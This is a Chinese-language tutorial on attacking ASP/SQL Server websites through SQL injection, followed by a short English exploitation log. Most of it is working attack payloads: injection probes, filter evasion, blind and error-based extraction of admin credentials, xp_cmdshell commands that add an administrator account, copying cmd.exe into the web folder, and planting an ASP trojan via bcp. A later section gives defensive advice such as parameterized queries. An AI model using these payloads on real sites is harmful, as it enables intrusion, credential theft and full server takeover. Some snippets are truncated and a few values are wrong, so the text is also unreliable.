1. 程式人生 > >滲透測試:SQL注入攻擊(ASP)

滲透測試:SQL注入攻擊(ASP)


分類: 滲透測試
SQL注入攻擊是黑客對資料庫進行攻擊的常用手段之一。隨著B/S模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫程式碼的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢程式碼,根據程式返回的結果,獲得某些他想得知的資料,這就是所謂的SQL Injection,即SQL注入。SQL注入是從正常的WWW埠訪問,而且表面看起來跟一般的Web頁面訪問沒什麼區別,所以目前市面的防火牆都不會對SQL注入發出警報,如果管理員沒檢視IIS日誌的習慣,可能被入侵很長時間都不會發覺。但是,SQL注入的手法相當靈活,在注入的時候會碰到很多意外的情況,需要構造巧妙的SQL語句,從而成功獲取想要的資料。
  SQL注入攻擊的總體思路
  ·發現SQL注入位置;
  ·判斷後臺數據庫型別;
  ·確定XP_CMDSHELL可執行情況
  ·發現WEB虛擬目錄
  ·上傳ASP木馬;
  ·得到管理員許可權;
  SQL注入攻擊的步驟
  一、SQL注入漏洞的判斷
  一般來說,SQL注入一般存在於形如:HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有引數的ASP動態網頁中,有時一個動態網頁中可能只有一個引數,有時可能有N個引數,有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的動態網頁且此網頁訪問了資料庫,那麼就有可能存在SQL注入。如果ASP程式設計師沒有安全意識,不進行必要的字元過濾,存在SQL注入的可能性就非常大。
  為了全面瞭解動態網頁回答的資訊,首選請調整IE的配置。把IE選單-工具-Internet選項-高階-顯示友好HTTP錯誤資訊前面的勾去掉。
  為了把問題說明清楚,以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進行分析,YY可能是整型,也有可能是字串。
  1、整型引數的判斷
  當輸入的引數YY為整型時,通常abc.asp中SQL語句原貌大致如下:
  select * from 表名 where 欄位=YY,所以可以用以下步驟測試SQL注入是否存在。
  ①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個單引號),此時abc.ASP中的SQL語句變成了
  select * from 表名 where 欄位=YY’,abc.asp執行異常;
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp執行正常,而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY執行結果相同;
  ③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp執行異常;
  如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
  2、字串型引數的判斷
  當輸入的引數YY為字串時,通常abc.asp中SQL語句原貌大致如下:
  select * from 表名 where 欄位='YY',所以可以用以下步驟測試SQL注入是否存在。
  ①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個單引號),此時abc.ASP中的SQL語句變成了
  select * from 表名 where 欄位=YY’,abc.asp執行異常;
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.asp執行正常,而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY執行結果相同;
  ③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.asp執行異常;
  如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。
  3、特殊情況的處理
  有時ASP程式設計師會在程式設計師過濾掉單引號等字元,以防止SQL注入。此時可以用以下幾種方法試一試。
  ①大小定混合法:由於VBS並不區分大小寫,而程式設計師在過濾時通常要麼全部過濾大寫字串,要麼全部過濾小寫字串,而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等;
  ②UNICODE法:在IIS中,以UNICODE字符集實現國際化,我們完全可以IE中輸入的字串化成UNICODE字串進行輸入。如+ =%2B,空格=%20 等;URLEncode資訊參見附件一;
  ③ASCII碼法:可以把輸入的部分或全部字元全部用ASCII碼代替,如U=chr(85),a=chr(97)等,ASCII資訊參見附件二;
  二、分析資料庫伺服器型別
  一般來說,ACCESS與SQL-SERVER是最常用的資料庫伺服器,儘管它們都支援T-SQL標準,但還有不同之處,而且不同的資料庫有不同的攻擊方法,必須要區別對待。
  1、 利用資料庫伺服器的系統變數進行區分
  SQL-SERVER有user,db_name()等系統變數,利用這些系統值不僅可以判斷SQL-SERVER,而且還可以得到大量有用資訊。如:
  ① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當前連線到資料庫的使用者名稱
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當前正在使用的資料庫名;
  2、利用系統表
  ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權,而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句:
  ①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
  若資料庫是SQL-SERVE,則第一條,abc.asp一定執行正常,第二條則異常;若是ACCESS則兩條都會異常。
  3、 MSSQL三個關鍵系統表
  sysdatabases系統表:Microsoft SQL Server 上的每個資料庫在表中佔一行。最初安裝 SQL Server 時,sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 資料庫的項。該表只儲存在 master 資料庫中。 這個表儲存在master資料庫中,這個表中儲存的是什麼資訊呢?這個非常重要。他是 儲存了所有的庫名,以及庫的ID和一些相關資訊。
  這裡我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名字。
  dbid //表示庫的ID,dbid從1到5是系統的。分別是:master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。
  Sysobjects:SQL-SERVER的每個資料庫內都有此係統表,它存放該資料庫內建立的所有物件,如約束、預設值、日誌、規則、儲存過程等,每個物件在表中佔一行。
  syscolumns:每個表和檢視中的每列在表中佔一行,儲存過程中的每個引數在表中也佔一行。該表位於每個資料庫中。主要欄位有:
  name ,id, colid :分別是欄位名稱,表ID號,欄位ID號,其中的 ID 是 剛上我們用sysobjects得到的表的ID號。
  用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中,表的ID是123456789中的所有欄位列表。
  三、確定XP_CMDSHELL可執行情況
  若當前連線資料的帳號具有SA許可權,且master.dbo.xp_cmdshell擴充套件儲存過程(呼叫此儲存過程可以直接使用作業系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以後的所有步驟都可以省
  1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但可以得到當前連線資料庫的使用者名稱(若顯示dbo則代表SA)。
  2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連線的資料庫名。
  3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主資料庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其後面的語句;“—”號是註解,表示其後面的所有內容僅為註釋,系統並不執行)可以直接增加作業系統帳戶aaa,密碼為bbb。
  4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加的帳戶aaa加到administrators組中。
  5、HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的資料內容全部備份到WEB目錄下,再用HTTP把此檔案下載(當然首選要知道WEB虛擬目錄)。
  6、通過複製CMD建立UNICODE漏洞
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便製造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
  四、發現WEB虛擬目錄
  只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER許可權。有兩種方法比較有效。
  一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執行虛擬目錄是:c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
  二是遍歷系統的目錄結構,分析結果並發現WEB虛擬目錄;
  先建立一個臨時表:temp
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
  接下來:
  (1)利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中:
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
  我們可以通過查詢temp的內容來獲得驅動器列表及相關資訊
  (2)利用xp_subdirs獲得子目錄列表,並存入temp表中:
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--
  (3)利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中:
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
  注意:
  1、以上每完成一項瀏覽後,應刪除TEMP中的所有內容,刪除方法是:
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
  2、瀏覽TEMP表的方法是:(假設TestDB是當前連線的資料庫名)
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id欄位的值,並與整數進行比較,顯然abc.asp工作異常,但在異常中卻可以發現id欄位的值。假設發現的表名是xyz,則
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二條記錄id欄位的值。
  五、上傳ASP木馬
  所謂ASP木馬,就是一段有特殊功能的ASP程式碼,並放入WEB虛擬目錄的Scripts下,遠端客戶通過IE就可執行它,進而得到系統的USER許可權,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:
  1、利用WEB的遠端管理功能
  許多WEB站點,為了維護的方便,都提供了遠端管理的功能;也有不少WEB站點,其內容是對於不同的使用者有不同的訪問許可權。為了達到對使用者許可權的控制,都有一個網頁,要求使用者名稱與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理,如上傳、下載檔案,目錄瀏覽、修改配置等。
  因此,若獲取正確的使用者名稱與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得到USER許可權而瀏覽系統,上一步的“發現WEB虛擬目錄”的複雜操作都可省略。
  使用者名稱及密碼一般存放在一張表中,發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。
  A、 注入法:
  從理論上說,認證網頁中會有型如:
  select * from admin where username='XXX' and password='YYY' 的語句,若在正式執行此句之前,沒有進行必要的字元過濾,則很容易實施SQL注入。
  如在使用者名稱文字框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則SQL語句變成:
  select * from admin where username='abc’ or 1=1 and password='123’ 不管使用者輸入任何使用者名稱與密碼,此語句永遠都能正確執行,使用者輕易騙過系統,獲取合法身份。
  B、猜解法:
  基本思路是:猜解所有資料庫名稱,猜出庫中的每張表名,分析可能是存放使用者名稱與密碼的表名,猜出表中的每個欄位名,猜出表中的每條記錄內容。
  猜解所有資料庫名稱
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因為 dbid 的值從1到5,是系統用了。所以使用者自己建的一定是從6開始的。並且我們提交了 name>1 (name欄位是一個字元型的欄位和數字比較會出錯),abc.asp工作異常,可得到第一個資料庫名,同理把DBID分別改成7,8,9,10,11,12…就可得到所有資料庫名。
  以下假設得到的資料庫名是TestDB。
  猜解資料庫中使用者名錶的名稱
  猜解法:此方法就是根據個人的經驗猜表名,一般來說,user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在,則abc.asp工作正常,否則異常。如此迴圈,直到猜到系統帳號表的名稱。
  讀取法:SQL-SERVER有一個存放系統核心資訊的表sysobjects,有關一個庫的所有表,檢視等資訊全部存放在此表中,而且此表可以通過WEB進行訪問。
  當xtype='U' and status>0代表是使用者建立的表,發現並分析每一個使用者建立的表及名稱,便可以得到使用者名錶的名稱,基本的實現方法是:
  ①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一個使用者建立表的名稱,並與整數進行比較,顯然abc.asp工作異常,但在異常中卻可以發現表的名稱。假設發現的表名是xyz,則
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第二個使用者建立的表的名稱,同理就可得到所有用建立的表的名稱。
  根據表的名稱,一般可以認定那張表使用者存放使用者名稱及密碼,以下假設此表名為Admin。
  l 猜解使用者名稱欄位及密碼欄位名稱
  admin表中一定有一個使用者名稱欄位,也一定有一個密碼欄位,只有得到此兩個欄位的名稱,才有可能得到此兩欄位的內容。如何得到它們的名稱呢,同樣有以下兩種方法。
  猜解法:此方法就是根據個人的經驗猜欄位名,一般來說,使用者名稱欄位的名稱常用:username,name,user,account等。而密碼欄位的名稱常用:password,pass,pwd,passwd等。並通過語句進行判斷
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(欄位名) from TestDB.dbo.admin)>0 “select count(欄位名) from 表名”語句得到表的行數,所以若欄位名存在,則abc.asp工作正常,否則異常。如此迴圈,直到猜到兩個欄位的名稱。
  讀取法:基本的實現方法是
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個欄位名,當與整數進行比較,顯然abc.asp工作異常,但在異常中卻可以發現欄位的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5,6…就可得到所有的欄位名稱。
  l 猜解使用者名稱與密碼
  猜使用者名稱與密碼的內容最常用也是最有效的方法有:
  ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的。基本的思路是先猜出欄位的長度,然後依次猜出每一位的值。猜使用者名稱與猜密碼的方法相同,以下以猜使用者名稱為例說明其過程。
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2,3,4,5,… n,username為使用者名稱欄位的名稱,admin為表的名稱),若x為某一值i且abc.asp執行正常時,則i就是第一個使用者名稱的長度。如:當輸入
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時abc.asp執行正常,則第一個使用者名稱的長度為8
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的使用者名稱長度之間,當m=1,2,3,…時猜測分別猜測第1,2,3,…位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之間的任意值;admin為系統使用者帳號表的名稱),若n為某一值i且abc.asp執行正常時,則i對應ASCII碼就是使用者名稱某一位值。如:當輸入
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時abc.asp執行正常,則使用者名稱的第三位為P(P的ASCII為80);
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時abc.asp執行正常,則使用者名稱的第9位為!(!的ASCII為80);
  猜到第一個使用者名稱及密碼後,同理,可以猜出其他所有使用者名稱與密碼。注意:有時得到的密碼可能是經MD5等方式加密後的資訊,還需要用專用工具進行脫密。或者先改其密碼,使用完後再改回來,見下面說明。
  簡單法:猜使用者名稱用
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個欄位,username是使用者名稱欄位,此時abc.asp工作異常,但能得到Username的值。與上同樣的方法,可以得到第二使用者名稱,第三個使用者等等,直到表中的所有使用者名稱。
  猜使用者密碼:HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個欄位,pwd是密碼欄位,此時abc.asp工作異常,但能得到pwd的值。與上同樣的方法,可以得到第二使用者名稱的密碼,第三個使用者的密碼等等,直到表中的所有使用者的密碼。密碼有時是經MD5加密的,可以改密碼。
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把密碼改成1;www為已知的使用者名稱)
  用同樣的方法當然可把密碼改原來的值。
  2、利用表內容導成檔案功能
  SQL有BCP命令,它可以把表的內容導成文字檔案並放到指定位置。利用這項功能,我們可以先建一張臨時表,然後在表中一行一行地輸入一個ASP木馬,然後用BCP命令匯出形成ASP檔案。
  命令列格式如下:
  bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P foobar ('S'引數為執行查詢的伺服器,'U'引數為使用者名稱,'P'引數為密碼,最終上傳了一個runcommand.asp的木馬)
  六、得到系統的管理員許可權
  ASP木馬只有USER許可權,要想獲取對系統的完全控制,還要有系統的管理員許可權。怎麼辦?提升許可權的方法有很多種:
  上傳木馬,修改開機自動執行的.ini檔案(它一重啟,便死定了);
  複製CMD.exe到scripts,人為製造UNICODE漏洞;
  下載SAM檔案,破解並獲取OS的所有使用者名稱密碼;
  等等,視系統的具體情況而定,可以採取不同的方法。
  七、幾個SQL-SERVER專用手段
  1、利用xp_regread擴充套件儲存過程修改登錄檔
  [xp_regread]另一個有用的內建儲存過程是xp_regXXXX類的函式集合(Xp_regaddmultistring,Xp_regdeletekey,Xp_regdeletevalue,Xp_regenumkeys,Xp_regenumvalues,Xp_regread,Xp_regremovemultistring,Xp_regwrite)。攻擊者可以利用這些函式修改登錄檔,如讀取SAM值,允許建立空連線,開機自動執行程式等。如:
  exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' 確定什麼樣的會話連線在伺服器可用。
  exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' 顯示伺服器上所有SNMP團體配置,有了這些資訊,攻擊者或許會重新配置同一網路中的網路裝置。
  2、利用其他儲存過程去改變伺服器
  xp_servicecontrol過程允許使用者啟動,停止服務。如:
  (exec master..xp_servicecontrol 'start','schedule'
  exec master..xp_servicecontrol 'start','server')
  Xp_availablemedia 顯示機器上有用的驅動器
  Xp_dirtree 允許獲得一個目錄樹
  Xp_enumdsn 列舉伺服器上的ODBC資料來源
  Xp_loginconfig 獲取伺服器安全資訊
  Xp_makecab 允許使用者在伺服器上建立一個壓縮檔案
  Xp_ntsec_enumdomains 列舉伺服器可以進入的域
  Xp_terminate_process 提供程序的程序ID,終止此程序
  SQL注入攻擊的背景
  在計算機技術高速發展的今天,越來越讓人們頭疼的是面臨越來越“變態”和複雜的威脅網站技術,他們利用Internet 執行各種惡意活動,如身份竊取、私密資訊竊取、頻寬資源佔用等。它們潛入之後,還會擴散並不斷更新自己。這些活動常常利用使用者的好奇心,在使用者不知道或未來允許的情況下潛入使用者的PC,不知不覺中,帳戶裡的資金就被轉移了,公司訊息也被傳送出去,危害十分嚴重。2006年8月16日,第一個Web威脅樣本出現,截止到2006年10月25日,已經產生了第150個變種,並且,還在不斷地演化下去。
  網站威脅的目標定位有多個維度,是個人還是公司,還是某種行業,都有其考慮,甚至國家、地區、性別、種族、宗教等也成為發動攻擊的原因或動機。攻擊還會採用多種形態,甚至是複合形態,比如病毒、蠕蟲、特洛伊、間諜軟體、殭屍、網路釣魚電子郵件、漏洞利用、下載程式、社會工程、rootkit、黑客,結果都可以導致使用者資訊受到危害,或者導致使用者所需的服務被拒絕和劫持。從其來源說Web威脅還可以分為內部攻擊和外部攻擊兩類。前者主要來自信任網路,可能是使用者執行了未授權訪問或是無意中定製了惡意攻擊;後者主要是由於網路漏洞被利用或者使用者受到惡意程式制定者的專一攻擊。
  SQL注入攻擊的網路分析
  SQL注入攻擊是非常令人討厭的安全漏洞,是所有的web開發人員,不管是什麼平臺,技術,還是資料層,需要確信他們理解和防止的東西。不幸的是,開發人員往往不集中花點時間在這上面,以至他們的應用,更糟糕的是,他們的客戶極其容易受到攻擊。
  Michael Sutton 最近發表了一篇非常發人深省的帖子,講述在公共網上這問題是多麼地普遍。他用Google的Search API建了一個C#的客戶端程式,尋找那些易受SQL 注入攻擊的網站。其步驟很簡單:
  1,尋找那些帶查詢字串的網站(例如,查詢那些在URL裡帶有 "id=" 的URL)
  2,給這些確定為動態的網站傳送一個請求,改變其中的id=語句,帶一個額外的單引號,來試圖取消其中的SQL語句(例如,如 id=6' )
  3,分析返回的回覆,在其中查詢象“SQL” 和“query”這樣的詞,這往往表示應用返回了詳細的錯誤訊息(這本身也是很糟糕的)
  4,檢查錯誤訊息是否表示傳送到SQL伺服器的引數沒有被正確加碼(encoded),如果如此,那麼表示可對該網站進行SQL注入攻擊
  對通過Google搜尋找到的1000個網站的隨機取樣測試,他檢測到其中的11.3%有易受SQL注入攻擊的可能。這非常,非常地可怕。這意味著黑客可以遠端利用那些應用裡的資料,獲取任何沒有hashed或加密的密碼或信用卡資料,甚至有以管理員身份登陸進這些應用的可能。這不僅對開發網站的開發人員來說很糟糕,而且對使用網站的消費者或使用者來說更糟糕,因為他們給網站提供了資料,想著網站是安全的呢。
  那麼SQL注入攻擊到底是什麼玩意?
  有幾種情形使得SQL注入攻擊成為可能。最常見的原因是,你動態地構造了SQL語句,卻沒有使用正確地加了碼(encoded)的引數。譬如,考慮這個SQL查詢的編碼,其目的是根據由查詢字串提供的社會保險號碼(social security number)來查詢作者(Authors):
  Dim SSN as String
  Dim SqlQuery as String
  SSN = Request.QueryString("SSN")
  SqlQuery = "SELECT au_lname, au_fname FROM authors WHERE au_id = '" + SSN + "'"
  如果你有象上面這個片斷一樣的SQL編碼,那麼你的整個資料庫和應用可以遠端地被黑掉。怎麼會呢?在普通情形下,使用者會使用一個社會保險號碼來訪問這個網站,編碼是象這樣執行的:
  ' URL to the page containing the above code
  http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
  ' SQL Query executed against the database
  SELECT au_lname, au_fname FROM authors WHERE au_id = '172-32-9999'
  這是開發人員預期的做法,通過社會保險號碼來查詢資料庫中作者的資訊。但因為引數值沒有被正確地加碼,黑客可以很容易地修改查詢字串的值,在要執行的值後面嵌入附加的SQL語句 。譬如,
  ' URL to the page containing the above code
  http://mysite.com/listauthordetails.aspx?SSN=172-32-9999';DROP DATABASE pubs --
  ' SQL Query executed against the database
  SELECT au_lname, au_fname FROM authors WHERE au_id = '';DROP DATABASE pubs --
  注意到沒有,可以在SSN查詢字串值的後面新增“ ';DROP DATABASE pubs -- ”,通過 “;”字元來終止當前的SQL語句,然後添加了自己的惡意的SQL語句,然後把語句的其他部分用“--”字串註釋掉。因為是手工在編碼裡構造SQL語句,最後把這個字串傳給了資料庫,資料庫會先對authors表進行查詢,然後把我們的pubs資料庫刪除。“砰(bang)”的一聲,資料庫就沒了!
  萬一你認為匿名黑客刪除你的資料庫的結果很壞,但不幸的是,實際上,這在SQL注入攻擊所涉及的情形中算是比較好的。一個黑客可以不單純摧毀資料,而是使用上面這個編碼的弱點,執行一個JOIN語句,來獲取你資料庫裡的所有資料,顯示在頁面上,允許他們獲取使用者名稱,密碼,信用卡號碼等等。他們也可以新增 UPDATE/INSERT 語句改變產品的價格,新增新的管理員賬號,真的搞砸你(screw up your life)呢。想象一下,到月底檢查庫存時,發現你庫房裡的實際產品數與你的賬目系統(accounting system)彙報的數目有所不同。
  如何防範SQL注入攻擊
  SQL注入攻擊是你需要擔心的事情,不管你用什麼web程式設計技術,再說所有的web框架都需要擔心這個的。你需要遵循幾條非常基本的規則:
  1)在構造動態SQL語句時,一定要使用類安全(type-safe)的引數加碼機制。大多數的資料API,包括ADO和ADO.NET,有這樣的支援,允許你指定所提供的引數的確切型別(譬如,字串,整數,日期等),可以保證這些引數被恰當地escaped/encoded了,來避免黑客利用它們。一定要從始到終地使用這些特性。
  例如,在ADO.NET裡對動態SQL,你可以象下面這樣重寫上述的語句,使之安全:
  Dim SSN as String = Request.QueryString("SSN")
  Dim cmd As new SqlCommand("SELECT au_lname, au_fname FROM authors WHERE au_id = @au_id")
  Dim param = new SqlParameter("au_id", SqlDbType.VarChar)
  param.Value = SSN
  cmd.Parameters.Add(param)
  這將防止有人試圖偷偷注入另外的SQL表示式(因為ADO.NET知道對au_id的字串值進行加碼),以及避免其他資料問題(譬如不正確地轉換數值型別等)。注意,VS 2005內建的TableAdapter/DataSet設計器自動使用這個機制,ASP.NET 2.0資料來源控制元件也是如此。
  一個常見的錯誤知覺(misperception)是,假如你使用了儲存過程或ORM,你就完全不受SQL注入攻擊之害了。這是不正確的,你還是需要確定在給儲存過程傳遞資料時你很謹慎,或在用ORM來定製一個查詢時,你的做法是安全的。
  2) 在部署你的應用前,始終要做安全審評(security review)。建立一個正式的安全過程(formal security process),在每次你做更新時,對所有的編碼做審評。後面一點特別重要。很多次我聽說開發隊伍在正式上線(going live)前會做很詳細的安全審評,然後在幾周或幾個月之後他們做一些很小的更新時,他們會跳過安全審評這關,推說,“就是一個小小的更新,我們以後再做編碼審評好了”。請始終堅持做安全審評。
  3) 千萬別把敏感性資料在資料庫裡以明文存放。我個人的意見是,密碼應該總是在單向(one-way )hashed過後再存放,我甚至不喜歡將它們在加密後存放。在預設設定下,ASP.NET 2.0 Membership API 自動為你這麼做,還同時實現了安全的SALT 隨機化行為(SALT randomization behavior)。如果你決定建立自己的成員資料庫,我建議你檢視一下我們在這裡發表的我們自己的Membership provider的原始碼。同時也確定對你的資料庫裡的信用卡和其他的私有資料進行了加密。這樣即使你的資料庫被人入侵(compromised)了的話,起碼你的客戶的私有資料不會被人利用。
  4)確認你編寫了自動化的單元測試,來特別校驗你的資料訪問層和應用程式不受SQL注入攻擊。這麼做是非常重要的,有助於捕捉住(catch)“就是一個小小的更新,所有不會有安全問題”的情形帶來的疏忽,來提供額外的安全層以避免偶然地引進壞的安全缺陷到你的應用裡去。
  5)鎖定你的資料庫的安全,只給訪問資料庫的web應用功能所需的最低的許可權。如果web應用不需要訪問某些表,那麼確認它沒有訪問這些表的許可權。如果web應用只需要只讀的許可權從你的account payables表來生成報表,那麼確認你禁止它對此表的 insert/update/delete 的許可權。
  6)很多新手從網上下載SQL通用防注入系統的程式,在需要防範注入的頁面頭部用 來防止別人進行手動注入測試(。
  可是如果通過SQL注入分析器就可輕鬆跳過防注入系統並自動分析其注入點。然後只需要幾分鐘,你的管理員賬號及密碼就會被分析出來。
  7)對於注入分析器的防範,筆者通過實驗,發現了一種簡單有效的防範方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中,發現軟體並不是衝著“admin”管理員賬號去的,而是衝著許可權(如flag=1)去的。這樣一來,無論你的管理員賬號怎麼變都無法逃過檢測。
  第三步:既然無法逃過檢測,那我們就做兩個賬號,一個是普通的管理員賬號,一個是防止注入的賬號,為什麼這麼說呢?筆者想,如果找一個許可權最大的賬號製造假象,吸引軟體的檢測,而這個賬號裡的內容是大於千字以上的中文字元,就會迫使軟體對這個賬號進行分析的時候進入全負荷狀態甚至資源耗盡而宕機。下面我們就來修改資料庫吧。
  1.對錶結構進行修改。將管理員的賬號欄位的資料型別進行修改,文字型改成最大欄位255(其實也夠了,如果還想做得再大點,可以選擇備註型),密碼的欄位也進行相同設定。
  2.對錶進行修改。設定管理員許可權的賬號放在ID1,並輸入大量中文字元(最好大於100個字)。
  3.把真正的管理員密碼放在ID2後的任何一個位置(如放在ID549上)。

  由於SQL注入攻擊針對的是應用開發過程中的程式設計不嚴密,因而對於絕大多數防火牆來說,這種攻擊是“合法”的。問題的解決只有依賴於完善程式設計。專門針對SQL注入攻擊的工具較少,Wpoison對於用asp,php進行的開發有一定幫助...。



EXAMPLE TO USE:
asp?id=1">http://www.xxxx.com/FullStory.asp?id=1

Exploiting the hole:
http://www.xxxx.com/FullStory.asp?id=1

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string .
/Including/general.asp, line 840 

 


VERSION
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:

[SQL Server]Syntax error converting the nvarchar value Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright &copy; 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) to a column of data type int.
/Including/general.asp, line 840

 


SERVER NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value UNESCO to a column of data type int.
/Including/general.asp, line 840

 


DATABASE NAME
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--

Code:

Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value NhaXinh to a column of data type int.
/Including/general.asp, line 840

 


USER
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--

Code:

